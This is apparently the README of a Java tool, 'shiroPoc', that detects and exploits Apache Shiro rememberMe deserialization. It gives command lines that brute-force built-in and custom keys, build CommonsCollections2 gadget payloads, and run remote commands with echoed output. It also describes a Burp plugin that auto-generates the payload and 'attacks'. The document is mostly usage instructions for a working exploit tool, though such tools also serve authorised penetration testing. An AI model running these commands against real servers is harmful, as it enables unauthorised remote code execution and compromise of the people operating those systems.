Awesome
mvn package 编译
欢迎关注 宽字节安全 公众号
changelog
- 新增shiro 检测方式(对,就是那个不需要gadget的检测方式) 2020.7.30
- 新增shiro 100 key
- 支持自定义key
- 支持作为插件导入burp
- 支持burp的被动扫描(需要burp pro版本
被动扫描演示
检测到shiro框架
自动探测shiro的key
burp插件使用方法
repeater界面中右键,生成payload 默认kph密钥,cc2利用链,获取信息,如果需要修改,请右键选择config
生成后,会自动替换request内容,并攻击
当然,这个jar包也可以直接在命令行下运行,生成rememberMe,或者检测,一切不变
自定义key检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/samples_web_war/ kPH+bIxk5D2deZiIxcaaaA==
内置100key检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar kPH+bIxk5D2deZiIxcaaaA== CommonsCollections2 XraySysProp
检测方式
运行
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc
检测
java -cp .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar org.unicodesec.poc http://localhost:8080/sam
ples_web_war/
shiro-urldns 检测&利用工具
支持shiro 16个key,支持攻击利用。支持的key与gadget以及攻击类型如下
查看目标服务器的系统信息
该攻击类型为XraySysProp
,使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XraySysProp
利用截图如下
执行命令并回显
该攻击类型为XrayCmd
使用方法如下
java -jar .\shiroPoc-1.0-SNAPSHOT-jar-with-dependencies.jar 16 CommonsCollections2 XrayCmd
利用截图如下
注意事项
- 建议删除不相关的http请求头,不然会因为http请求头过大而提示400错误
- 建议使用CommonsCollections2 gadget,体积小,利用率高